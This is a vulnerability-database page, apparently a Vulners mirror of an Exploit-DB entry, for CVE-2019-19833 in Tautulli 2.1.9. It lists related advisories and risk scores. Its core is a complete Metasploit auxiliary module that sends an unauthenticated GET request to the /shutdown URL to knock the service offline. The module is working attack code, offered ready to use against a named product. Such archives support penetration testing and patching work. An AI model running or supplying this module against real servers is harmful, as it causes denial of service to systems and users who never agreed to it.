Lucene search
K

Tautulli 2.1.9 - Denial of Service (Metasploit)

🗓️ 16 Jan 2020 00:00:00Reported by Ismail TasdelenType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 152 Views

Tautulli v2.1.9 - Shutdown Denial of Service. Vulnerable to denial of service via the /shutdown URL

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Tautulli 2.1.9 - Denial of Service Exploit
16 Jan 202000:00
zdt
GithubExploit
Exploit for Cross-Site Request Forgery (CSRF) in Tautulli
1 Jan 202600:39
githubexploit
Circl
CVE-2019-19833
19 Mar 202016:50
circl
CNVD
Tautulli Cross-Site Request Forgery Vulnerability
18 Dec 201900:00
cnvd
CVE
CVE-2019-19833
18 Dec 201917:08
cve
Cvelist
CVE-2019-19833
18 Dec 201917:08
cvelist
exploitpack
Tautulli 2.1.9 - Denial of Service ( Metasploit )
16 Jan 202000:00
exploitpack
Metasploit
Tautulli v2.1.9 - Shutdown Denial of Service
17 Jan 202010:57
metasploit
NVD
CVE-2019-19833
18 Dec 201918:15
nvd
Packet Storm
Tautulli 2.1.9 Cross Site Request Forgery
17 Dec 201900:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name'        => 'Tautulli v2.1.9 - Shutdown Denial of Service',
      'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
      'Author'      => 'Ismail Tasdelen',
      'License'     => MSF_LICENSE,
      'References'  =>
      [
        ['CVE', '2019-19833'],
        ['EDB', '47785']
      ]
    )
    register_options([ Opt::RPORT(8181) ])
  end

  def run
    res = send_request_raw({
      'method' => 'GET',
      'uri' => '/shutdown'
    })

    if res
      print_status("Request sent to #{rhost}")
    else
      print_status("No reply from #{rhost}")
    end
  rescue Errno::ECONNRESET
    print_status('Connection reset')
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jan 2020 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.5
EPSS0.56759
152